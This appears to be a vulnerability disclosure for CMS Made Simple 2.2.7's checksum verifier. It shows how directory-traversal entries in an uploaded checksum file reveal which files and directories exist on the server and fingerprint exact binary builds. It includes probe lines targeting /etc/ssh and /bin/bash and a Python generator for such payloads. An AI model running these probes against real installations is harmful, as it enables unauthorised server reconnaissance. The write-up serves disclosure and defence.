@0xn1k5
Created April 9, 2018 20:13
Possible to brute-force and fingerprint known files and directories through the CMS Made Simple checksum verification feature
Issue Description:
CMS Made Simple has a feature that lets the admin user download a checksum file, which can later be uploaded again to verify the integrity of the installation's files after a suspected compromise. It was observed that an admin user can upload a custom checksum file whose entries use directory traversal ("../") to make the verifier stat arbitrary paths outside the web root. The verifier's response differs depending on whether the path is a directory, an existing file, or missing, so it acts as an existence oracle for files and directories anywhere on the server that the web server user can read.
Issue verified on version: CMS Made Simple 2.2.7 (latest at the time of writing); earlier versions may also be affected.
Download Link: http://s3.amazonaws.com/cmsms/downloads/14144/cmsms-2.2.7-install.zip
Vendor Site: https://www.cmsmadesimple.org/about/cms-made-simple/
Risk:
An authenticated admin can enumerate installed software by probing known file and directory names outside the CMS installation.
Because the per-file checksum is derived only from the MD5 of two predictable files (lib/version.php and index.php) plus the MD5 of the target, a default installation also lets the user fingerprint known binaries: supplying the MD5 of a specific build of a file yields an exact match or mismatch, revealing the application or binary version.
Steps to reproduce the issue:
1) Log in to the admin dashboard and open the URL below, or navigate to "Site Admin" > "System Verification" > "Perform Validation":
http://target/path/admin/checksum.php?__c=fde83629cd9b67f8911
2) Download the checksum file, then upload a modified copy containing one of the entries below. Each entry starts from a real module directory and walks up with "../" until it reaches the filesystem root; the checksum on the left is a placeholder, so only the verifier's file-existence verdict matters:
Case 1: If the directory exists - Output: "All Checksum match"
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh
Case 2: If the directory doesn't exist - Output: "1 File not found"
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh2
Case 3: If the file exists - Output: "1 Files failed md5sum check"
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config
Case 4: If the file doesn't exist - Output: "1 File not found"
c8c2bbfe37084ec6db23ad5a7f6c1114--::--/modules/Search/templates/../../../../../../../../../../../../../../../etc/ssh/ssh_config_no_file
3) The checksum value on the left side of each entry is computed with the formula below. It is salted only with the MD5 digests of /lib/version.php and /index.php, both of which are identical across default installations of the same release. An attacker can therefore obtain the salt from a local test install of the same version, combine it with the md5sum of a known binary (for example the /bin/bash shipped by a given distribution release), and use the resulting checksum to confirm not just that the file exists but that it is that exact build.
Code Snippet (from lib/classes/ or admin/checksum.php, elided to the relevant lines):
$salt = md5_file($config['root_path']."/lib/version.php") . md5_file($config['root_path']."/index.php");
// ...
$md5 = md5($salt . md5_file($fn));
Case: Verifying the checksum of /bin/bash - Output: "All checksums match those in the uploaded file"
71fdfce0a76d11f6db3e3ac730bf223a--::--/modules/Search/templates/../../../../../../../bin/bash
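The following is an added example, not code from the gist or from CMS Made Simple. It reproduces the salt and checksum construction described in step 3, generates probe lines in the "--::--" format for the four cases in step 2 plus a known-binary fingerprint, and interprets the verifier's verdicts. The server side is modelled locally in simulate_verify(), which is an assumption built from the four observed outputs rather than a copy of checksum.php; it resolves every path under a temporary directory so the traversal never touches the real filesystem. The version.php and index.php contents, the /var/www/cmsms install root and the /bin/bash stand-in are all constructed for the demo; in a real engagement the salt inputs come from a clean install of the same release.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Constructed stand-ins for the two files CMSMS folds into its salt. In a real
# engagement these come from a clean install of the same release (2.2.7 here),
# since the salt is nothing more than their two MD5 digests concatenated.
SAMPLE_VERSION_PHP = b"<?php\n$CMS_VERSION = '2.2.7';\n"
SAMPLE_INDEX_PHP = b"<?php\nrequire_once(__DIR__.'/lib/include.php');\n"

SEPARATOR = "--::--"             # field separator used by the checksum file
INSTALL_ROOT = "/var/www/cmsms"  # assumed value of $config['root_path']
# A long run of ../ after a real module path, exactly as the gist's probes do.
TRAVERSAL = "/modules/Search/templates/" + "../" * 15
JUNK_MD5 = "0" * 32              # placeholder digest when only existence matters


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def cmsms_salt(version_php: bytes, index_php: bytes) -> str:
    """Same construction as $salt = md5_file(lib/version.php) . md5_file(index.php)."""
    return md5_hex(version_php) + md5_hex(index_php)


def cmsms_checksum(salt: str, file_md5: str) -> str:
    """Same construction as $md5 = md5($salt . md5_file($fn))."""
    return md5_hex((salt + file_md5).encode("ascii"))


def probe_line(salt: str, target: str, known_md5: str = JUNK_MD5) -> str:
    """One checksum-file line that makes the verifier stat `target` on the server.

    With JUNK_MD5 the verdict works as an existence oracle; pass the MD5 of a
    specific build of the file instead to fingerprint it exactly (/bin/bash case).
    """
    return f"{cmsms_checksum(salt, known_md5)}{SEPARATOR}{TRAVERSAL}{target.lstrip('/')}"


def classify(verdict: str) -> str:
    """Map the verdict strings reported in the write-up to what they reveal."""
    v = verdict.lower()
    if "not found" in v:
        return "absent"
    if "failed md5sum" in v:
        return "file exists, contents differ from the supplied digest"
    if "match" in v:
        return "directory, or file whose contents match the supplied digest"
    return "unrecognised verdict"


def simulate_verify(fake_fs: Path, salt: str, checksum_file: str) -> list:
    """Local model of the server-side check, derived from the four observed
    cases (an assumption; the real checksum.php is not reproduced). Every path
    is resolved under `fake_fs`, so ../ traversal never reaches the real disk.
    """
    verdicts = []
    for line in checksum_file.splitlines():
        digest, rel = line.split(SEPARATOR, 1)
        resolved = os.path.normpath(INSTALL_ROOT + rel)  # ../ climbs above the install
        p = fake_fs / resolved.lstrip("/")
        if not p.exists():
            verdicts.append("1 File not found")
        elif p.is_dir() or cmsms_checksum(salt, md5_hex(p.read_bytes())) == digest:
            verdicts.append("All checksums match those in the uploaded file")
        else:
            verdicts.append("1 Files failed md5sum check")
    return verdicts


def demo() -> dict:
    """Build a fake filesystem holding the write-up's four cases and probe it."""
    salt = cmsms_salt(SAMPLE_VERSION_PHP, SAMPLE_INDEX_PHP)
    bash_bytes = b"\x7fELF constructed stand-in for /bin/bash\n"  # constructed, not a real binary
    with tempfile.TemporaryDirectory() as tmp:
        fs = Path(tmp)
        (fs / "etc/ssh").mkdir(parents=True)
        (fs / "etc/ssh/ssh_config").write_bytes(b"Host *\n")
        (fs / "bin").mkdir()
        (fs / "bin/bash").write_bytes(bash_bytes)
        targets = {
            "/etc/ssh": JUNK_MD5,                     # Case 1: directory exists
            "/etc/ssh2": JUNK_MD5,                    # Case 2: directory missing
            "/etc/ssh/ssh_config": JUNK_MD5,          # Case 3: file exists
            "/etc/ssh/ssh_config_no_file": JUNK_MD5,  # Case 4: file missing
            "/bin/bash": md5_hex(bash_bytes),         # fingerprint a known build
        }
        upload = "\n".join(probe_line(salt, t, m) for t, m in targets.items()) + "\n"
        verdicts = simulate_verify(fs, salt, upload)
    return {t: classify(v) for t, v in zip(targets, verdicts)}


if __name__ == "__main__":
    for target, meaning in demo().items():
        print(f"{target:30} {meaning}")
```

Feeding the output of probe_line() for a wordlist of paths into the real upload form, one path per line, turns the verifier into a batch existence oracle; the /bin/bash entry shows why the weak, installation-independent salt matters, since a plain existence oracle could not distinguish one build of a binary from another.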
0xn1k5 commented Apr 9, 2018

[Screenshot: Probing a valid file]

[Screenshot: Probing an invalid file]

[Screenshot: Probing a valid directory name]

[Screenshot: Probing an invalid directory name]

[Screenshot: Calculating the MD5 hash for a known binary]

[Screenshot: Verifying/fingerprinting the known binary using the MD5 checksum calculated above]
